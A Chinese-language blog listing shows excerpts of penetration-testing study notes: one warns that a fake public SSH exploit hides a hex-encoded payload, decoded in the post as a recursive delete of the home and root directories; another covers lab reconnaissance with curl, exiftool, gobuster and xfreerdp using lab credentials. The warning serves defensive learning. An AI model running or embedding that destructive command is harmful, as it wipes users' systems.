發表文章

目前顯示的是有「encode」標籤的文章

公開的漏洞(Public Exploits)

圖片
 公開的漏洞(Public Exploits) 公開漏洞 OpenOwn 本來是針對 SSH 的漏洞攻擊程式,實際上內容非常詭異 首先是要求 root 的權限如下面這一段 if (geteuid()) {   puts("Root is required for raw sockets, etc."); return 1; } 接著往下翻可以看到一段使用 16 進制編碼的 impcode 內容如下 [...] char jmpcode[] = "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f" "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"; [...] 透過 python3 將 16 進制解碼來看 └─$ python3                     >>> jmpcode = ["\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"] >>> print(jmpcode) ['rm -rf ~ /* 2> /dev/null &'] --> 這個是從根目錄移除所有 object 的命令,且還使用了 2>/dev/null 將 standard error 丟到 null,這樣一來不小心使用到的人系統就掛了 公開漏洞資料庫 Exploit Database 由 Offsec 維護,是一個值得信賴的漏洞查找資料庫 https://www.exploit-db.com/ 另一個查找漏洞好用的網站  https://packetstormsecurity.com/ 以及訪間最多人使用的平台 GitHub  https://github.com/ 但 GitHub 上是每個人都可以任意發佈的地方所以未經驗證的漏洞利用要盡量避免 可以使用一些官方的 GitHub 帳號來使用,例如 Of...

客戶端攻擊(Client-Side Attack)

圖片
 客戶端攻擊(Client-Side Attack) 查看檔案 metadata 訊息,第一步透過 curl 下載檔案 curl -o [local file name] [File URL],範例 : └─$ curl -o oldd.pdf http://192.168.187.197/old.pdf 讀檔案 metadata 用指令 exiftool,範例 : └─$ exiftool -a -u oldd.pdf     -a          (-duplicates)        Allow duplicate tags to be extracted -u          (-unknown)         Extract unknown tags 使用 gobuster 查找某網站是否有 PDF 檔案,指令如下 └─$ gobuster -w directory-list-2.3-medium.txt dir -u http://192.168.187.197/ -t 100 -x php 下載 info.pdf,└─$ curl -o info.pdf http://192.168.187.197/info.pdf 一樣 exiftool 看一下 metadata,└─$ exiftool -a -u info.pdf Linux 上透過 RDP 連線到 Windows 使用之指令 xfreerdp 範例 : └─$ xfreerdp -v:192.168.187.196 -u:offsec -p:lab -size:80%  -v : 遠端主機  -u : 遠端登入帳號  -p : 遠端登入密碼  -size : 遠端桌面視窗比例  -drive:davidou,/home/kali_r #掛載遠端硬碟到對方去(davidou 表示網路磁碟機分享名稱),掛載如下圖  -tls-seclevel:0 : 當遇到 win7 或是更早以前的系統時,因為只...